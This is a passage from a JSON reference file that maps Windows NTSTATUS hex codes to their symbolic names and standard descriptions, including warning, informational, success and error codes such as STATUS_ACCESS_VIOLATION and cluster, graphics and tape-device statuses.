\"STATUS_WAKE_SYSTEM_DEBUGGER\",\n            \"description\": \"{Kernel Debugger Awakened} The system debugger was awakened by an interrupt.\"\n        },\n        \"80000010\": {\n            \"code\": \"STATUS_DEVICE_OFF_LINE\",\n            \"description\": \"{Device Offline} The printer has been taken offline.\"\n        },\n        \"80000011\": {\n            \"code\": \"STATUS_DEVICE_BUSY\",\n            \"description\": \"{Device Busy} The device is currently busy.\"\n        },\n        \"80000012\": {\n            \"code\": \"STATUS_NO_MORE_EAS\",\n            \"description\": \"{No More EAs} No more extended attributes (EAs) were found for the file.\"\n        },\n        \"80000013\": {\n            \"code\": \"STATUS_INVALID_EA_NAME\",\n            \"description\": \"{Illegal EA} The specified extended attribute (EA) name contains at least one illegal character.\"\n        },\n        \"80000014\": {\n            \"code\": \"STATUS_EA_LIST_INCONSISTENT\",\n            \"description\": \"{Inconsistent EA List} The extended attribute (EA) list is inconsistent.\"\n        },\n        \"80000015\": {\n            \"code\": \"STATUS_INVALID_EA_FLAG\",\n            \"description\": \"{Invalid EA Flag} An invalid extended attribute (EA) flag was set.\"\n        },\n        \"80000016\": {\n            \"code\": \"STATUS_VERIFY_REQUIRED\",\n            \"description\": \"{Verifying Disk} The media has changed and a verify operation is in progress; therefore, no reads or writes can be performed to the device, except those that are used in the verify operation.\"\n        },\n        \"80000017\": {\n            \"code\": \"STATUS_EXTRANEOUS_INFORMATION\",\n            \"description\": \"{Too Much Information} The specified access control list (ACL) contained more information than was expected.\"\n        },\n        \"80000018\": {\n            \"code\": \"STATUS_RXACT_COMMIT_NECESSARY\",\n            \"description\": \"This warning level status indicates that the transaction state already exists for the registry subtree, but that a transaction commit was previously aborted. The commit has NOT been completed but has not been rolled back either; therefore, it can still be committed, if needed.\"\n        },\n        \"80000020\": {\n            \"code\": \"STATUS_MEDIA_CHECK\",\n            \"description\": \"{Media Changed} The media might have changed.\"\n        },\n        \"80000021\": {\n            \"code\": \"STATUS_SETMARK_DETECTED\",\n            \"description\": \"A tape access reached a set mark.\"\n        },\n        \"80000022\": {\n            \"code\": \"STATUS_NO_DATA_DETECTED\",\n            \"description\": \"During a tape access, the end of the data written is reached.\"\n        },\n        \"80000023\": {\n            \"code\": \"STATUS_REDIRECTOR_HAS_OPEN_HANDLES\",\n            \"description\": \"The redirector is in use and cannot be unloaded.\"\n        },\n        \"80000024\": {\n            \"code\": \"STATUS_SERVER_HAS_OPEN_HANDLES\",\n            \"description\": \"The server is in use and cannot be unloaded.\"\n        },\n        \"80000025\": {\n            \"code\": \"STATUS_ALREADY_DISCONNECTED\",\n            \"description\": \"The specified connection has already been disconnected.\"\n        },\n        \"80000026\": {\n            \"code\": \"STATUS_LONGJUMP\",\n            \"description\": \"A long jump has been executed.\"\n        },\n        \"80000027\": {\n            \"code\": \"STATUS_CLEANER_CARTRIDGE_INSTALLED\",\n            \"description\": \"A cleaner cartridge is present in the tape library.\"\n        },\n        \"80000028\": {\n            \"code\": \"STATUS_PLUGPLAY_QUERY_VETOED\",\n            \"description\": \"The Plug and Play query operation was not successful.\"\n        },\n        \"80000029\": {\n            \"code\": \"STATUS_UNWIND_CONSOLIDATE\",\n            \"description\": \"A frame consolidation has been executed.\"\n        },\n        \"80000288\": {\n            \"code\": \"STATUS_DEVICE_REQUIRES_CLEANING\",\n            \"description\": \"The device has indicated that cleaning is necessary.\"\n        },\n        \"80000289\": {\n            \"code\": \"STATUS_DEVICE_DOOR_OPEN\",\n            \"description\": \"The device has indicated that its door is open. Further operations require it closed and secured.\"\n        },\n        \"80000803\": {\n            \"code\": \"STATUS_DATA_LOST_REPAIR\",\n            \"description\": \"Windows discovered a corruption in the file %hs. This file has now been repaired. Check if any data in the file was lost because of the corruption.\"\n        },\n        \"80010001\": {\n            \"code\": \"DBG_EXCEPTION_NOT_HANDLED\",\n            \"description\": \"Debugger did not handle the exception.\"\n        },\n        \"80130001\": {\n            \"code\": \"STATUS_CLUSTER_NODE_ALREADY_UP\",\n            \"description\": \"The cluster node is already up.\"\n        },\n        \"80130002\": {\n            \"code\": \"STATUS_CLUSTER_NODE_ALREADY_DOWN\",\n            \"description\": \"The cluster node is already down.\"\n        },\n        \"80130003\": {\n            \"code\": \"STATUS_CLUSTER_NETWORK_ALREADY_ONLINE\",\n            \"description\": \"The cluster network is already online.\"\n        },\n        \"80130004\": {\n            \"code\": \"STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE\",\n            \"description\": \"The cluster network is already offline.\"\n        },\n        \"80130005\": {\n            \"code\": \"STATUS_CLUSTER_NODE_ALREADY_MEMBER\",\n            \"description\": \"The cluster node is already a member of the cluster.\"\n        },\n        \"80190009\": {\n            \"code\": \"STATUS_COULD_NOT_RESIZE_LOG\",\n            \"description\": \"The log could not be set to the requested size.\"\n        },\n        \"80190029\": {\n            \"code\": \"STATUS_NO_TXF_METADATA\",\n            \"description\": \"There is no transaction metadata on the file.\"\n        },\n        \"80190031\": {\n            \"code\": \"STATUS_CANT_RECOVER_WITH_HANDLE_OPEN\",\n            \"description\": \"The file cannot be recovered because there is a handle still open on it.\"\n        },\n        \"80190041\": {\n            \"code\": \"STATUS_TXF_METADATA_ALREADY_PRESENT\",\n            \"description\": \"Transaction metadata is already present on this file and cannot be superseded.\"\n        },\n        \"80190042\": {\n            \"code\": \"STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET\",\n            \"description\": \"A transaction scope could not be entered because the scope handler has not been initialized.\"\n        },\n        \"80210001\": {\n            \"code\": \"STATUS_FVE_PARTIAL_METADATA\",\n            \"description\": \"Volume metadata read or write is incomplete.\"\n        },\n        \"80210002\": {\n            \"code\": \"STATUS_FVE_TRANSIENT_STATE\",\n            \"description\": \"BitLocker encryption keys were ignored because the volume was in a transient state.\"\n        },\n        \"00000000\": {\n            \"code\": \"STATUS_SUCCESS\",\n            \"description\": \"The operation completed successfully.\"\n        },\n        \"00000001\": {\n            \"code\": \"STATUS_WAIT_1\",\n            \"description\": \"The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state.\"\n        },\n        \"00000002\": {\n            \"code\": \"STATUS_WAIT_2\",\n            \"description\": \"The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state.\"\n        },\n        \"00000003\": {\n            \"code\": \"STATUS_WAIT_3\",\n            \"description\": \"The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state.\"\n        },\n        \"0000003f\": {\n            \"code\": \"STATUS_WAIT_63\",\n            \"description\": \"The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state.\"\n        },\n        \"00000080\": {\n            \"code\": \"STATUS_ABANDONED\",\n            \"description\": \"The caller attempted to wait for a mutex that has been abandoned.\"\n        },\n        \"000000bf\": {\n            \"code\": \"STATUS_ABANDONED_WAIT_63\",\n            \"description\": \"The caller attempted to wait for a mutex that has been abandoned.\"\n        },\n        \"000000c0\": {\n            \"code\": \"STATUS_USER_APC\",\n            \"description\": \"A user-mode APC was delivered before the given Interval expired.\"\n        },\n        \"00000101\": {\n            \"code\": \"STATUS_ALERTED\",\n            \"description\": \"The delay completed because the thread was alerted.\"\n        },\n        \"00000102\": {\n            \"code\": \"STATUS_TIMEOUT\",\n            \"description\": \"The given Timeout interval expired.\"\n        },\n        \"00000103\": {\n            \"code\": \"STATUS_PENDING\",\n            \"description\": \"The operation that was requested is pending completion.\"\n        },\n        \"00000104\": {\n            \"code\": \"STATUS_REPARSE\",\n            \"description\": \"A reparse should be performed by the Object Manager because the name of the file resulted in a symbolic link.\"\n        },\n        \"00000105\": {\n            \"code\": \"STATUS_MORE_ENTRIES\",\n            \"description\": \"Returned by enumeration APIs to indicate more information is available to successive calls.\"\n        },\n        \"00000106\": {\n            \"code\": \"STATUS_NOT_ALL_ASSIGNED\",\n            \"description\": \"Indicates not all privileges or groups that are referenced are assigned to the caller. This allows, for example, all privileges to be disabled without having to know exactly which privileges are assigned.\"\n        },\n        \"00000107\": {\n            \"code\": \"STATUS_SOME_NOT_MAPPED\",\n            \"description\": \"Some of the information to be translated has not been translated.\"\n        },\n        \"00000108\": {\n            \"code\": \"STATUS_OPLOCK_BREAK_IN_PROGRESS\",\n            \"description\": \"An open/create operation completed while an opportunistic lock (oplock) break is underway.\"\n        },\n        \"00000109\": {\n            \"code\": \"STATUS_VOLUME_MOUNTED\",\n            \"description\": \"A new volume has been mounted by a file system.\"\n        },\n        \"0000010a\": {\n            \"code\": \"STATUS_RXACT_COMMITTED\",\n            \"description\": \"This success level status indicates that the transaction state already exists for the registry subtree but that a transaction commit was previously aborted. The commit has now been completed.\"\n        },\n        \"0000010b\": {\n            \"code\": \"STATUS_NOTIFY_CLEANUP\",\n            \"description\": \"Indicates that a notify change request has been completed due to closing the handle that made the notify change request.\"\n        },\n        \"0000010c\": {\n            \"code\": \"STATUS_NOTIFY_ENUM_DIR\",\n            \"description\": \"Indicates that a notify change request is being completed and that the information is not being returned in the caller's buffer. The caller now needs to enumerate the files to find the changes.\"\n        },\n        \"0000010d\": {\n            \"code\": \"STATUS_NO_QUOTAS_FOR_ACCOUNT\",\n            \"description\": \"{No Quotas} No system quota limits are specifically set for this account.\"\n        },\n        \"0000010e\": {\n            \"code\": \"STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED\",\n            \"description\": \"{Connect Failure on Primary Transport} An attempt was made to connect to the remote server %hs on the primary transport, but the connection failed. The computer WAS able to connect on a secondary transport.\"\n        },\n        \"00000110\": {\n            \"code\": \"STATUS_PAGE_FAULT_TRANSITION\",\n            \"description\": \"The page fault was a transition fault.\"\n        },\n        \"00000111\": {\n            \"code\": \"STATUS_PAGE_FAULT_DEMAND_ZERO\",\n            \"description\": \"The page fault was a demand zero fault.\"\n        },\n        \"00000112\": {\n            \"code\": \"STATUS_PAGE_FAULT_COPY_ON_WRITE\",\n            \"description\": \"The page fault was a demand zero fault.\"\n        },\n        \"00000113\": {\n            \"code\": \"STATUS_PAGE_FAULT_GUARD_PAGE\",\n            \"description\": \"The page fault was a demand zero fault.\"\n        },\n        \"00000114\": {\n            \"code\": \"STATUS_PAGE_FAULT_PAGING_FILE\",\n            \"description\": \"The page fault was satisfied by reading from a secondary storage device.\"\n        },\n        \"00000115\": {\n            \"code\": \"STATUS_CACHE_PAGE_LOCKED\",\n            \"description\": \"The cached page was locked during operation.\"\n        },\n        \"00000116\": {\n            \"code\": \"STATUS_CRASH_DUMP\",\n            \"description\": \"The crash dump exists in a paging file.\"\n        },\n        \"00000117\": {\n            \"code\": \"STATUS_BUFFER_ALL_ZEROS\",\n            \"description\": \"The specified buffer contains all zeros.\"\n        },\n        \"00000118\": {\n            \"code\": \"STATUS_REPARSE_OBJECT\",\n            \"description\": \"A reparse should be performed by the Object Manager because the name of the file resulted in a symbolic link.\"\n        },\n        \"00000119\": {\n            \"code\": \"STATUS_RESOURCE_REQUIREMENTS_CHANGED\",\n            \"description\": \"The device has succeeded a query-stop and its resource requirements have changed.\"\n        },\n        \"00000120\": {\n            \"code\": \"STATUS_TRANSLATION_COMPLETE\",\n            \"description\": \"The translator has translated these resources into the global space and no additional translations should be performed.\"\n        },\n        \"00000121\": {\n            \"code\": \"STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY\",\n            \"description\": \"The directory service evaluated group memberships locally, because it was unable to contact a global catalog server.\"\n        },\n        \"00000122\": {\n            \"code\": \"STATUS_NOTHING_TO_TERMINATE\",\n            \"description\": \"A process being terminated has no threads to terminate.\"\n        },\n        \"00000123\": {\n            \"code\": \"STATUS_PROCESS_NOT_IN_JOB\",\n            \"description\": \"The specified process is not part of a job.\"\n        },\n        \"00000124\": {\n            \"code\": \"STATUS_PROCESS_IN_JOB\",\n            \"description\": \"The specified process is part of a job.\"\n        },\n        \"00000125\": {\n            \"code\": \"STATUS_VOLSNAP_HIBERNATE_READY\",\n            \"description\": \"{Volume Shadow Copy Service} The system is now ready for hibernation.\"\n        },\n        \"00000126\": {\n            \"code\": \"STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY\",\n            \"description\": \"A file system or file system filter driver has successfully completed an FsFilter operation.\"\n        },\n        \"00000127\": {\n            \"code\": \"STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED\",\n            \"description\": \"The specified interrupt vector was already connected.\"\n        },\n        \"00000128\": {\n            \"code\": \"STATUS_INTERRUPT_STILL_CONNECTED\",\n            \"description\": \"The specified interrupt vector is still connected.\"\n        },\n        \"00000129\": {\n            \"code\": \"STATUS_PROCESS_CLONED\",\n            \"description\": \"The current process is a cloned process.\"\n        },\n        \"0000012a\": {\n            \"code\": \"STATUS_FILE_LOCKED_WITH_ONLY_READERS\",\n            \"description\": \"The file was locked and all users of the file can only read.\"\n        },\n        \"0000012b\": {\n            \"code\": \"STATUS_FILE_LOCKED_WITH_WRITERS\",\n            \"description\": \"The file was locked and at least one user of the file can write.\"\n        },\n        \"00000202\": {\n            \"code\": \"STATUS_RESOURCEMANAGER_READ_ONLY\",\n            \"description\": \"The specified ResourceManager made no changes or updates to the resource under this transaction.\"\n        },\n        \"00000367\": {\n            \"code\": \"STATUS_WAIT_FOR_OPLOCK\",\n            \"description\": \"An operation is blocked and waiting for an oplock.\"\n        },\n        \"00010001\": {\n            \"code\": \"DBG_EXCEPTION_HANDLED\",\n            \"description\": \"Debugger handled the exception.\"\n        },\n        \"00010002\": {\n            \"code\": \"DBG_CONTINUE\",\n            \"description\": \"The debugger continued.\"\n        },\n        \"001c0001\": {\n            \"code\": \"STATUS_FLT_IO_COMPLETE\",\n            \"description\": \"The IO was completed by a filter.\"\n        },\n        \"4000000a\": {\n            \"code\": \"STATUS_FT_READ_RECOVERY_FROM_BACKUP\",\n            \"description\": \"{Redundant Read} To satisfy a read request, the Windows NT operating system fault-tolerant file system successfully read the requested data from a redundant copy. This was done because the file system encountered a failure on a member of the fault-tolerant volume but was unable to reassign the failing area of the device.\"\n        },\n        \"4000000b\": {\n            \"code\": \"STATUS_FT_WRITE_RECOVERY\",\n            \"description\": \"{Redundant Write} To satisfy a write request, the Windows NT fault-tolerant file system successfully wrote a redundant copy of the information. This was done because the file system encountered a failure on a member of the fault-tolerant volume but was unable to reassign the failing area of the device.\"\n        },\n        \"4000000c\": {\n            \"code\": \"STATUS_SERIAL_COUNTER_TIMEOUT\",\n            \"description\": \"{Serial IOCTL Timeout} A serial I/O operation completed because the time-out period expired. (The IOCTL_SERIAL_XOFF_COUNTER had not reached zero.)\"\n        },\n        \"4000000d\": {\n            \"code\": \"STATUS_NULL_LM_PASSWORD\",\n            \"description\": \"{Password Too Complex} The Windows password is too complex to be converted to a LAN Manager password. The LAN Manager password that returned is a NULL string.\"\n        },\n        \"4000000e\": {\n            \"code\": \"STATUS_IMAGE_MACHINE_TYPE_MISMATCH\",\n            \"description\": \"{Machine Type Mismatch} The image file %hs is valid but is for a machine type other than the current machine. Select OK to continue, or CANCEL to fail the DLL load.\"\n        },\n        \"4000000f\": {\n            \"code\": \"STATUS_RECEIVE_PARTIAL\",\n            \"description\": \"{Partial Data Received} The network transport returned partial data to its client. The remaining data will be sent later.\"\n        },\n        \"4000001a\": {\n            \"code\": \"STATUS_LOG_HARD_ERROR\",\n            \"description\": \"Application popup: %1 : %2\"\n        },\n        \"4000001b\": {\n            \"code\": \"STATUS_ALREADY_WIN32\",\n            \"description\": \"A Win32 process already exists.\"\n        },\n        \"4000001c\": {\n            \"code\": \"STATUS_WX86_UNSIMULATE\",\n            \"description\": \"An exception status code that is used by the Win32 x86 emulation subsystem.\"\n        },\n        \"4000001d\": {\n            \"code\": \"STATUS_WX86_CONTINUE\",\n            \"description\": \"An exception status code that is used by the Win32 x86 emulation subsystem.\"\n        },\n        \"4000001e\": {\n            \"code\": \"STATUS_WX86_SINGLE_STEP\",\n            \"description\": \"An exception status code that is used by the Win32 x86 emulation subsystem.\"\n        },\n        \"4000001f\": {\n            \"code\": \"STATUS_WX86_BREAKPOINT\",\n            \"description\": \"An exception status code that is used by the Win32 x86 emulation subsystem.\"\n        },\n        \"4000002a\": {\n            \"code\": \"STATUS_HIBERNATED\",\n            \"description\": \"The system was put into hibernation.\"\n        },\n        \"4000002b\": {\n            \"code\": \"STATUS_RESUME_HIBERNATION\",\n            \"description\": \"The system was resumed from hibernation.\"\n        },\n        \"4000002c\": {\n            \"code\": \"STATUS_FIRMWARE_UPDATED\",\n            \"description\": \"Windows has detected that the system firmware (BIOS) was updated [previous firmware date = %2, current firmware date %3].\"\n        },\n        \"4000002d\": {\n            \"code\": \"STATUS_DRIVERS_LEAKING_LOCKED_PAGES\",\n            \"description\": \"A device driver is leaking locked I/O pages and is causing system degradation. The system has automatically enabled the tracking code to try and catch the culprit.\"\n        },\n        \"4000002e\": {\n            \"code\": \"STATUS_MESSAGE_RETRIEVED\",\n            \"description\": \"The ALPC message being canceled has already been retrieved from the queue on the other side.\"\n        },\n        \"4000002f\": {\n            \"code\": \"STATUS_SYSTEM_POWERSTATE_TRANSITION\",\n            \"description\": \"The system power state is transitioning from %2 to %3.\"\n        },\n        \"400200af\": {\n            \"code\": \"RPC_NT_SEND_INCOMPLETE\",\n            \"description\": \"Some data remains to be sent in the request buffer.\"\n        },\n        \"400a0004\": {\n            \"code\": \"STATUS_CTX_CDM_CONNECT\",\n            \"description\": \"The Client Drive Mapping Service has connected on Terminal Connection.\"\n        },\n        \"400a0005\": {\n            \"code\": \"STATUS_CTX_CDM_DISCONNECT\",\n            \"description\": \"The Client Drive Mapping Service has disconnected on Terminal Connection.\"\n        },\n        \"4015000d\": {\n            \"code\": \"STATUS_SXS_RELEASE_ACTIVATION_CONTEXT\",\n            \"description\": \"A kernel mode component is releasing a reference on an activation context.\"\n        },\n        \"401a000c\": {\n            \"code\": \"STATUS_LOG_NO_RESTART\",\n            \"description\": \"The log service encountered a log stream with no restart area.\"\n        },\n        \"401b00ec\": {\n            \"code\": \"STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST\",\n            \"description\": \"{Display Driver Recovered From Failure} The %hs display driver has detected a failure and recovered from it. Some graphical operations might have failed. The next time you restart the machine, a dialog box appears, giving you an opportunity to upload data about this failure to Microsoft.\"\n        },\n        \"401e000a\": {\n            \"code\": \"STATUS_GRAPHICS_PARTIAL_DATA_POPULATED\",\n            \"description\": \"The specified buffer is not big enough to contain the entire requested dataset. Partial data is populated up to the size of the buffer.The caller needs to provide a buffer of the size as specified in the partially populated buffer's content (interface specific).\"\n        },\n        \"401e0117\": {\n            \"code\": \"STATUS_GRAPHICS_DRIVER_MISMATCH\",\n            \"description\": \"The kernel driver detected a version mismatch between it and the user mode driver.\"\n        },\n        \"401e0307\": {\n            \"code\": \"STATUS_GRAPHICS_MODE_NOT_PINNED\",\n            \"description\": \"No mode is pinned on the specified VidPN source/target.\"\n        },\n        \"401e031e\": {\n            \"code\": \"STATUS_GRAPHICS_NO_PREFERRED_MODE\",\n            \"description\": \"The specified mode set does not specify a preference for one of its modes.\"\n        },\n        \"401e034b\": {\n            \"code\": \"STATUS_GRAPHICS_DATASET_IS_EMPTY\",\n            \"description\": \"The specified dataset (for example, mode set, frequency range set, descriptor set, or topology) is empty.\"\n        },\n        \"401e034c\": {\n            \"code\": \"STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET\",\n            \"description\": \"The specified dataset (for example, mode set, frequency range set, descriptor set, or topology) does not contain any more elements.\"\n        },\n        \"401e0351\": {\n            \"code\": \"STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED\",\n            \"description\": \"The specified content transformation is not pinned on the specified VidPN present path.\"\n        },\n        \"401e042f\": {\n            \"code\": \"STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS\",\n            \"description\": \"The child device presence was not reliably detected.\"\n        },\n        \"401e0437\": {\n            \"code\": \"STATUS_GRAPHICS_LEADLINK_START_DEFERRED\",\n            \"description\": \"Starting the lead adapter in a linked configuration has been temporarily deferred.\"\n        },\n        \"401e0439\": {\n            \"code\": \"STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY\",\n            \"description\": \"The display adapter is being polled for children too frequently at the same polling level.\"\n        },\n        \"401e043a\": {\n            \"code\": \"STATUS_GRAPHICS_START_DEFERRED\",\n            \"description\": \"Starting the adapter has been temporarily deferred.\"\n        },\n        \"8000000a\": {\n            \"code\": \"STATUS_HANDLES_CLOSED\",\n            \"description\": \"{Handles Closed} Handles to objects have been automatically closed because of the requested operation.\"\n        },\n        \"8000000b\": {\n            \"code\": \"STATUS_NO_INHERITANCE\",\n            \"description\": \"{Non-Inheritable ACL} An access control list (ACL) contains no components that can be inherited.\"\n        },\n        \"8000000c\": {\n            \"code\": \"STATUS_GUID_SUBSTITUTION_MADE\",\n            \"description\": \"{GUID Substitution} During the translation of a globally unique identifier (GUID) to a Windows security ID (SID), no administratively defined GUID prefix was found. A substitute prefix was used, which will not compromise system security. However, this might provide a more restrictive access than intended.\"\n        },\n        \"8000000d\": {\n            \"code\": \"STATUS_PARTIAL_COPY\",\n            \"description\": \"Because of protection conflicts, not all the requested bytes could be copied.\"\n        },\n        \"8000000e\": {\n            \"code\": \"STATUS_DEVICE_PAPER_EMPTY\",\n            \"description\": \"{Out of Paper} The printer is out of paper.\"\n        },\n        \"8000000f\": {\n            \"code\": \"STATUS_DEVICE_POWERED_OFF\",\n            \"description\": \"{Device Power Is Off} The printer power has been turned off.\"\n        },\n        \"8000001a\": {\n            \"code\": \"STATUS_NO_MORE_ENTRIES\",\n            \"description\": \"{No More Entries} No more entries are available from an enumeration operation.\"\n        },\n        \"8000001b\": {\n            \"code\": \"STATUS_FILEMARK_DETECTED\",\n            \"description\": \"{Filemark Found} A filemark was detected.\"\n        },\n        \"8000001c\": {\n            \"code\": \"STATUS_MEDIA_CHANGED\",\n            \"description\": \"{Media Changed} The media has changed.\"\n        },\n        \"8000001d\": {\n            \"code\": \"STATUS_BUS_RESET\",\n            \"description\": \"{I/O Bus Reset} An I/O bus reset was detected.\"\n        },\n        \"8000001e\": {\n            \"code\": \"STATUS_END_OF_MEDIA\",\n            \"description\": \"{End of Media} The end of the media was encountered.\"\n        },\n        \"8000001f\": {\n            \"code\": \"STATUS_BEGINNING_OF_MEDIA\",\n            \"description\": \"The beginning of a tape or partition has been detected.\"\n        },\n        \"8000002a\": {\n            \"code\": \"STATUS_REGISTRY_HIVE_RECOVERED\",\n            \"description\": \"{Registry Hive Recovered} The registry hive (file): %hs was corrupted and it has been recovered. Some data might have been lost.\"\n        },\n        \"8000002b\": {\n            \"code\": \"STATUS_DLL_MIGHT_BE_INSECURE\",\n            \"description\": \"The application is attempting to run executable code from the module %hs. This might be insecure. An alternative, %hs, is available. Should the application use the secure module %hs?\"\n        },\n        \"8000002c\": {\n            \"code\": \"STATUS_DLL_MIGHT_BE_INCOMPATIBLE\",\n            \"description\": \"The application is loading executable code from the module %hs. This is secure but might be incompatible with previous releases of the operating system. An alternative, %hs, is available. Should the application use the secure module %hs?\"\n        },\n        \"8000002d\": {\n            \"code\": \"STATUS_STOPPED_ON_SYMLINK\",\n            \"description\": \"The create operation stopped after reaching a symbolic link.\"\n        },\n        \"801b00eb\": {\n            \"code\": \"STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED\",\n            \"description\": \"{Display Driver Stopped Responding and recovered} The %hs display driver has stopped working normally. The recovery had been performed.\"\n        },\n        \"801c0001\": {\n            \"code\": \"STATUS_FLT_BUFFER_TOO_SMALL\",\n            \"description\": \"{Buffer too small} The buffer is too small to contain the entry. No information has been written to the buffer.\"\n        },\n        \"c0000001\": {\n            \"code\": \"STATUS_UNSUCCESSFUL\",\n            \"description\": \"{Operation Failed} The requested operation was unsuccessful.\"\n        },\n        \"c0000002\": {\n            \"code\": \"STATUS_NOT_IMPLEMENTED\",\n            \"description\": \"{Not Implemented} The requested operation is not implemented.\"\n        },\n        \"c0000003\": {\n            \"code\": \"STATUS_INVALID_INFO_CLASS\",\n            \"description\": \"{Invalid Parameter} The specified information class is not a valid information class for the specified object.\"\n        },\n        \"c0000004\": {\n            \"code\": \"STATUS_INFO_LENGTH_MISMATCH\",\n            \"description\": \"The specified information record length does not match the length that is required for the specified information class.\"\n        },\n        \"c0000005\": {\n            \"code\": \"STATUS_ACCESS_VIOLATION\",\n            \"description\": \"The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.\"\n        },\n        \"c0000006\": {\n            \"code\": \"STATUS_IN_PAGE_ERROR\",\n            \"description\": \"The instruction at 0x%08lx referenced memory at 0x%08lx. The required data was not placed into memory because of an I/O error status of 0x%08lx.\"\n        },\n        \"c0000007\": {\n            \"code\": \"STATUS_PAGEFILE_QUOTA\",\n            \"description\": \"The page file quota for the process has been exhausted.\"\n        },\n        \"c0000008\": {\n            \"code\": \"STATUS_INVALID_HANDLE\",\n            \"description\": \"An invalid HANDLE was specified.\"\n        },\n        \"c0000009\": {\n            \"code\": \"STATUS_BAD_INITIAL_STACK\",\n            \"description\": \"An invalid initial stack was specified in a call to NtCreateThread.\"\n        },\n        \"c000000a\": {\n            \"code\": \"STATUS_BAD_INITIAL_PC\",\n            \"description\": \"An invalid initial start address was specified in a call to NtCreateThread.\"\n        },\n        \"c000000b\": {\n            \"code\": \"STATUS_INVALID_CID\",\n            \"description\": \"An invalid client ID was specified.\"\n        },\n        \"c000000c\": {\n            \"code\": \"STATUS_TIMER_NOT_CANCELED\",\n            \"description\": \"An attempt was made to cancel or set a timer that has an associated APC and the specified thread is not the thread that originally set the timer with an associated APC routine.\"\n        },\n        \"c000000d\": {\n            \"code\": \"STATUS_INVALID_PARAMETER\",\n            \"description\": \"An invalid parameter was passed to a service or function.\"\n        },\n        \"c000000e\": {\n            \"code\": \"STATUS_NO_SUCH_DEVICE\",\n            \"description\": \"A device that does not exist was specified.\"\n        },\n        \"c000000f\": {\n            \"code\": \"STATUS_NO_SUCH_FILE\",\n            \"description\": \"{File Not Found} The file %hs does not exist.\"\n        },\n        \"c0000010\": {\n            \"code\": \"STATUS_INVALID_DEVICE_REQUEST\",\n            \"description\": \"The specified request is not a valid operation for the target device.\"\n        },\n        \"c0000011\": {\n            \"code\": \"STATUS_END_OF_FILE\",\n            \"description\": \"The end-of-file marker has been reached. There is no valid data in the file beyond this marker.\"\n        },\n        \"c0000012\": {\n            \"code\": \"STATUS_WRONG_VOLUME\",\n            \"description\": \"{Wrong Volume} The wrong volume is in the drive. Insert volume %hs into drive %hs.\"\n        },\n        \"c0000013\": {\n            \"code\": \"STATUS_NO_MEDIA_IN_DEVICE\",\n            \"description\": \"{No Disk} There is no disk in the drive. Insert a disk into drive %hs.\"\n        },\n        \"c0000014\": {\n            \"code\": \"STATUS_UNRECOGNIZED_MEDIA\",\n            \"description\": \"{Unknown Disk Format} The disk in drive %hs is not formatted properly. Check the disk, and reformat it, if needed.\"\n        },\n        \"c0000015\": {\n            \"code\": \"STATUS_NONEXISTENT_SECTOR\",\n            \"description\": \"{Sector Not Found} The specified sector does not exist.\"\n        },\n        \"c0000016\": {\n            \"code\": \"STATUS_MORE_PROCESSING_REQUIRED\",\n            \"description\": \"{Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.\"\n        },\n        \"c0000017\": {\n            \"code\": \"STATUS_NO_MEMORY\",\n            \"description\": \"{Not Enough Quota} Not enough virtual memory or paging file quota is available to complete the specified operation.\"\n        },\n        \"c0000018\": {\n            \"code\": \"STATUS_CONFLICTING_ADDRESSES\",\n            \"description\": \"{Conflicting Address Range} The specified address range conflicts with the address space.\"\n        },\n        \"c0000019\": {\n            \"code\": \"STATUS_NOT_MAPPED_VIEW\",\n            \"description\": \"The address range to unmap is not a mapped view.\"\n        },\n        \"c000001a\": {\n            \"code\": \"STATUS_UNABLE_TO_FREE_VM\",\n            \"description\": \"The virtual memory cannot be freed.\"\n        },\n        \"c000001b\": {\n            \"code\": \"STATUS_UNABLE_TO_DELETE_SECTION\",\n            \"description\": \"The specified section cannot be deleted.\"\n        },\n        \"c000001c\": {\n            \"code\": \"STATUS_INVALID_SYSTEM_SERVICE\",\n            \"description\": \"An invalid system service was specified in a system service call.\"\n        },\n        \"c000001d\": {\n            \"code\": \"STATUS_ILLEGAL_INSTRUCTION\",\n            \"description\": \"{EXCEPTION} Illegal Instruction An attempt was made to execute an illegal instruction.\"\n        },\n        \"c000001e\": {\n            \"code\": \"STATUS_INVALID_LOCK_SEQUENCE\",\n            \"description\": \"{Invalid Lock Sequence} An attempt was made to execute an invalid lock sequence.\"\n        },\n        \"c000001f\": {\n            \"code\": \"STATUS_INVALID_VIEW_SIZE\",\n            \"description\": \"{Invalid Mapping} An attempt was made to create a view for a section that is bigger than the section.\"\n        },\n        \"c0000020\": {\n            \"code\": \"STATUS_INVALID_FILE_FOR_SECTION\",\n            \"description\": \"{Bad File} The attributes of the specified mapping file for a section of memory cannot be read.\"\n        },\n        \"c0000021\": {\n            \"code\": \"STATUS_ALREADY_COMMITTED\",\n            \"description\": \"{Already Committed} The specified address range is already committed.\"\n        },\n        \"c0000022\": {\n            \"code\": \"STATUS_ACCESS_DENIED\",\n            \"description\": \"{Access Denied} A process has requested access to an object but has not been granted those access rights.\"\n        },\n        \"c0000023\": {\n            \"code\": \"STATUS_BUFFER_TOO_SMALL\",\n            \"description\": \"{Buffer Too Small} The buffer is too small to contain the entry. No information has been written to the buffer.\"\n        },\n        \"c0000024\": {\n            \"code\": \"STATUS_OBJECT_TYPE_MISMATCH\",\n            \"description\": \"{Wrong Type} There is a mismatch between the type of object that is required by the requested operation and the type of object that is specified in the request.\"\n        },\n        \"c0000025\": {\n            \"code\": \"STATUS_NONCONTINUABLE_EXCEPTION\",\n            \"description\": \"{EXCEPTION} Cannot 